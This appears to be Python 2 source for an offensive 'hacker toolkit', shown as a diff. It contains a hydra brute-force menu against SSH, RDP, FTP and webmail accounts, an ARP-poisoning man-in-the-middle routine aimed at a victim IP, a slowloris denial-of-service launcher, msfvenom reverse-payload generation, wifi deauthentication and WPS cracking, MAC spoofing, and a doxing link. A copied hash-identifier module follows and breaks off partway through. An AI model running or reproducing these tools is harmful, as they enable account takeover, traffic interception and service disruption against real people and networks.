:) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arppois(): + + try: + os.system("iwconfig") + interface = raw_input("[*] Enter Interface: ") + victimIP = raw_input("[*] Enter Victim IP: ") + gateIP = raw_input("[*] Enter Router IP: ") + except KeyboardInterrupt: + print "\n[*] User Requested Shutdown" + print "[*] Exiting..." + os.system("clear") + mainbanner() + + print "\n[*] Enabling IP Forwarding...\n" + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + + def get_mac(IP): + conf.verb = 0 + ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) + for snd,rcv in ans: + return rcv.sprintf(r"%Ether.src%") + + def reARP(): + + print "\n[*] Restoring Targets..." + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) + print "[*] Disabling IP Forwarding..." + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[*] Shutting Down..." + os.system("clear") + mainbanner() + + def trick(gm, vm): + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + + def mitm(): + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Victim MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Gateway MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + print "[*] Poisoning Targets..." + while 1: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + reARP() + break + mitm() +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and 